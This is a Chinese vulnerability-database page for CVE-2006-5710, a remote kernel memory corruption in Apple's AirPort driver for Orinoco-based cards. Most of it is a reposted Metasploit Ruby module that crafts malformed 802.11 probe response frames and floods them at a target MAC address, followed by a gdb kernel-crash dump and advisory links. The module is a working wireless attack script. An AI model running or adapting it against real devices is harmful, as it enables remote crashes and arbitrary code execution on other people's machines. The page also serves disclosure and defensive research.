Apple Airport驱动远程代码执行漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111440 漏洞类型 缓冲区溢出
发布时间 2006-11-01 更新时间 2006-11-29
CVE编号 CVE-2006-5710 CNNVD-ID CNNVD-200611-039
漏洞平台 Hardware CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/2700
https://www.securityfocus.com/bid/20862
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200611-039
|漏洞详情
AppleAirPort设备是一款无线访问接入点,可为网络客户端提供802.11服务。AppleAirPort在处理畸形probe响应报文时存在内存破坏漏洞,远程攻击者可能利用此漏洞在用户机器上执行任意指令。基于Orinoco的Airport网卡所提供的AppleAirport驱动存在内存破坏漏洞。当驱动置于积极扫描模式时,则如果接收到了固定长度头后没有包含有效的信息单元(IE)字段的probe响应帧的话,就会破坏内存内核结构,导致执行任意指令。
|漏洞EXP
# A proof-of-concept exploit has been added to the Metasploit Framework 3.0 source tree:
# msf > use auxiliary/dos/wireless/daringphucball

require 'msf/core'

module Msf

class Auxiliary::Dos::Wireless::DaringPhucball < Msf::Auxiliary

	include Exploit::Lorcon


	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'Apple Airport 802.11 Probe Response Kernel Memory Corruption',
			'Description'    => %q{
				The Apple Airport driver provided with Orinoco-based Airport cards (1999-2003 PowerBooks, iMacs)
				is vulnerable to a remote memory corruption flaw. When the driver is placed into active scanning 
				mode, a malformed probe response frame can be used to corrupt internal kernel structures, leading
				to arbitrary code execution. This vulnerability is triggered when a probe response frame is received
				that does not contain valid information element (IE) fields after the fixed-length header. The data 
				following the fixed-length header is copied over internal kernel structures, resulting in memory 
				operations being performed on attacker-controlled pointer values.
			},
			
			'Author'         => [ 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 3666 $'
		))
		register_options(
			[
				OptInt.new('COUNT', [ true, "The number of frames to send", 2000]),
				OptString.new('ADDR_DST', [ true,  "The MAC address of the target system"])
			], self.class)					
	end

	#
	# This bug is easiest to trigger when the card has been placed into active scan mode:
	# $ /System/Library/PrivateFrameworks/Apple80211.framework/Versions/A/Resources/airport -s -r 10000
	#

	def run
		open_wifi
		
		cnt = datastore['COUNT'].to_i

		print_status("Creating malicious probe response frame...")		
		frame = create_frame()
		
		print_status("Sending #{cnt} frames...")
		0.upto(cnt) { |i| wifi.write(frame)	}
	end
	
	def eton(addr)
		addr.split(':').map { |c| c.hex.chr }.join
	end

	def create_frame
		bssid    = Rex::Text.rand_text(6)
		seq      = [rand(255)].pack('n')
		caps     = [rand(65535)].pack('n')
		
		frame = 
			"\x50" +                      # type/subtype
			"\x00" +                      # flags
			"\x00\x00" +                  # duration  
			eton(datastore['ADDR_DST']) + # dst
			bssid +                       # src
			bssid +                       # bssid
			seq   +                       # seq  
			Rex::Text.rand_text(8) +      # timestamp value
			Rex::Text.rand_text(2) +      # beacon interval
			Rex::Text.rand_text(2)        # capabilities
		
		frame << [0x0defaced].pack('N') * ((1024-frame.length) / 4)
		
		return frame

	end	
end
end	

=begin

Tested on a 1.0Ghz PowerBook running 10.4.8 with the latest updates (Halloween, 2006)

Unresolved kernel trap(cpu 0): 0x300 - Data access DAR=0x000000000DEFACF7 PC=0x00000000007A2260
Latest crash info for cpu 0:
   Exception state (sv=0x3AA12A00)
      PC=0x007A2260; MSR=0x00009030; DAR=0x0DEFACF7; DSISR=0x40000000; LR=0x007A1D48; R1=0x17443B60; XCP=0x0000000C (0x300 - Data access)
      Backtrace:
0x01BC80AC 0x007A1D48 0x0079FA54 0x0079FF94 0x0079FEBC 0x002D0B94
         0x002CFA5C 0x000A9314
      Kernel loadable modules in backtrace (with dependencies):
         com.apple.driver.AppleAirPort(3.4.4)@0x797000
            dependency: com.apple.iokit.IONetworkingFamily(1.5.0)@0x5f8000
Proceeding back via exception chain:
   Exception state (sv=0x3AA12A00)
      previously dumped as "Latest" state. skipping...
   Exception state (sv=0x31F13A00)
      PC=0x00000000; MSR=0x0000D030; DAR=0x00000000; DSISR=0x00000000; LR=0x00000000; R1=0x00000000; XCP=0x00000000 (Unknown)

Kernel version:
Darwin Kernel Version 8.8.0: Fri Sep  8 17:18:57 PDT 2006; root:xnu-792.12.6.obj~1/RELEASE_PPC



(gdb) showcurrentstacks
task        vm_map      ipc_space  #acts   pid  proc        command
0x01a73dd8  0x00cdaf3c  0x01a68ef0   38      0  0x003fb200  kernel_task
            activation  thread      pri  state  wait_queue  wait_event
            0x01a7c000  0x01a7c000   82  R
                reserved_stack=0x173b0000
                kernel_stack=0x17440000
                stacktop=0x17443b60
                0x17443b60  0x1bc80ac
                0x17443be0  0x7a1d48 <com.apple.driver.AppleAirPort + 0xad48>
                0x17443c60  0x79fa54 <com.apple.driver.AppleAirPort + 0x8a54>
                0x17443ce0  0x79ff94 <com.apple.driver.AppleAirPort + 0x8f94>
                0x17443d90  0x79febc <com.apple.driver.AppleAirPort + 0x8ebc>
                0x17443df0  0x2d0b94 <_ZN22IOInterruptEventSource12checkForWorkEv+184>
                0x17443e40  0x2cfa5c <_ZN10IOWorkLoop10threadMainEv+104>
                0x17443e90  0xa9314 <Call_continuation+20>
                stackbottom=0x17443e90


(gdb) x/3i $pc
0x7a2260 <mhp.1762+3571640>:    lbz     r8,0(r2)
0x7a2264 <mhp.1762+3571644>:    addi    r2,r2,1
0x7a2268 <mhp.1762+3571648>:    stw     r2,0(r11)

(gdb) i r $r2
r2             0xdefacf7        233811191

(gdb) x/x $r11
0x17443bb8:     0x0defacf7


(gdb) bt
#0  0x007a2260 in mhp.1762 ()
#1  0x007a1d48 in mhp.1762 ()
warning: Previous frame identical to this frame (corrupt stack?)
#2  0x007a1d48 in mhp.1762 ()
#3  0x0079fa54 in mhp.1762 ()
#4  0x0079ff94 in mhp.1762 ()
#5  0x0079febc in mhp.1762 ()
#6  0x002d0b94 in IOInterruptEventSource::checkForWork (this=0x1d80d40) at /SourceCache/xnu/xnu-792.12.6/iokit/Kernel/IOInterruptEventSource.cpp:196
#7  0x002cfa5c in IOWorkLoop::threadMain (this=0x1d803c0) at /SourceCache/xnu/xnu-792.12.6/iokit/Kernel/IOWorkLoop.cpp:267


(gdb) x/40x $r1
0x17443b60:     0x17443be0      0x22424022      0x01bc80ac      0x00000038
0x17443b70:     0x00d43c54      0x0004ffff      0x01bc81f4      0x00000210
0x17443b80:     0x02275000      0x003d8000      0x004fa418      0x00365000
0x17443b90:     0x01d803c0      0x00033e88      0x01a7c01c      0x01a7c0a4
0x17443ba0:     0x0defaced      0x01bc8000      0x0227581e      0x0defacf7
0x17443bb0:     0x00000000      0x0227581e      0x0defacf7      0x00000001
0x17443bc0:     0x00000002      0x01bc81f4      0x00000000      0x00000000
0x17443bd0:     0x17443c10      0x01a858c0      0x17443be0      0x01d80d40
0x17443be0:     0x17443c60      0x01bc81f4      0x007a1d48      0x00000000
0x17443bf0:     0x17443c20      0x00008088      0x01bc8000      0x0227581e

=end

# milw0rm.com [2006-11-01]
|受影响的产品
Apple Orinoco Airport Driver 0
|参考资料

来源:TA06-333A
名称:TA06-333A
链接:http://www.us-cert.gov/cas/techalerts/TA06-333A.html
来源:VU#191336
名称:VU#191336
链接:http://www.kb.cert.org/vuls/id/191336
来源:XF
名称:airport-driver-code-execution(29965)
链接:http://xforce.iss.net/xforce/xfdb/29965
来源:BID
名称:20862
链接:http://www.securityfocus.com/bid/20862
来源:VUPEN
名称:ADV-2006-4750
链接:http://www.frsirt.com/english/advisories/2006/4750
来源:VUPEN
名称:ADV-2006-4313
链接:http://www.frsirt.com/english/advisories/2006/4313
来源:SECTRACK
名称:1017151
链接:http://securitytracker.com/id?1017151
来源:SECUNIA
名称:23155
链接:http://secunia.com/advisories/23155
来源:SECUNIA
名称:22679
链接:http://secunia.com/advisories/22679
来源:MISC
链接:http://projects.info-pull.com/mokb/MOKB-01-11-2006.html
来源:APPLE
名称:APPLE-SA-2006-11-28
链接:http://lists.apple.com/archives/security-announce/2006/Nov/msg00001.html
来源:docs.info.apple.com
链接:http://docs.info.apple.com/article.html?artnum=304829
来源:OSVDB
名称:30180
链接:http://www.osvdb.org/30180